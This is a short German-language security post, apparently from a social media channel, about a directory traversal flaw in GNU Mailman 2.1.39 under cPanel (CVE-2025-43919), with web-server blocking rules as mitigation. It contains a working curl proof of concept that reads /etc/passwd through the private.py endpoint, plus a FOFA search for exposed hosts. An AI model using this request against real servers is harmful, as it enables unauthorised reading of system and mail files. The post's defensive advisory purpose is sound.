
In GNU Mailman 2.1.39, das mit cPanel/WHM gebündelt ist, wurde eine neue Schwachstelle entdeckt, die es nicht authentifizierten Remote-Angreifern ermöglicht, über einen Directory-Traversal-Fehler beliebige Dateien auf dem Server zu lesen.
In GNU Mailman 2.1.39, das mit cPanel/WHM gebündelt ist, wurde eine neue Schwachstelle entdeckt, die es nicht authentifizierten Remote-Angreifern ermöglicht, über einen Verzeichnis-Traversal-Fehler beliebige Dateien auf dem Server zu lesen.
📌 Zusammenfassung der Schwachstelle:
Directory Traversal (nicht authentifiziert)private.py CGI-Skript/mailman/private/mailman/etc/passwd, .mbox archives und Mailman configs5.8 (Medium)CVE-2025-43919Status: Kein offizieller Patch (Mailman 2.1.x ist EOL)
🔥 Proof of Concept:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 Angriffsszenarien:
/etc/passwd, configs oder mailbox files auslesen🛡️ Gegenmaßnahmen:
Zugriff auf /mailman/private auf Webserver-Ebene blockieren:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
Oder in Nginx:
location /mailman/private {
deny all;
return 403;
}
⬆️ Migration auf Mailman 3.x — 2.x ist EOL und verfügt nicht über moderne Schutzmechanismen
🔍 FOFA-Abfrage : app="Mailman"
📚 Informieren Sie sich, teilen Sie verantwortungsbewusst und halten Sie Ihre Infrastruktur sicher.
🔒 Folgen Sie für weitere reale CVEs, PoCs und Hardening-Tipps: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity